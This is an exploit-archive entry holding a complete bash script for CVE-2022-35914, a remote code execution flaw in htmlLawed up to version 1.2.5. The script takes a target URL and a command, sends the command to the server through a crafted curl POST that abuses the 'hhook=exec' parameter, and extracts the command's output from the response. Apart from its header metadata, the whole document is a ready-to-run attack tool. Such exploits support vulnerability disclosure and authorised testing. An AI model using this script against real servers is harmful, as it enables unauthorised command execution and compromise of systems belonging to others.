htmlLawed 1.2.5 Remote Command Execution

`#!/bin/bash  
  
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution  
  
# Date: 2024-05-02  
# Exploit Author: Miguel Redondo (aka d4t4s3c)  
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed  
# Software Link: https://github.com/kesar/HTMLawed  
# Version: <= 1.2.5  
# Tested on: Linux  
# Category: Web Application  
# CVE: CVE-2022-35914  
  
while getopts ":u:c:" arg; do  
case ${arg} in  
u) url=${OPTARG}; let parameter_counter+=1 ;;  
c) cmd=${OPTARG}; let parameter_counter+=1 ;;  
esac  
done  
  
if [ -z "${url}" ] || [ -z "${cmd}" ]; then  
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  
echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"  
exit 1  
else  
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  
echo -e "\n[+] Executing Command: ${cmd}\n"  
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')  
echo -e "${cmd_output}\n"  
exit 0  
fi  
`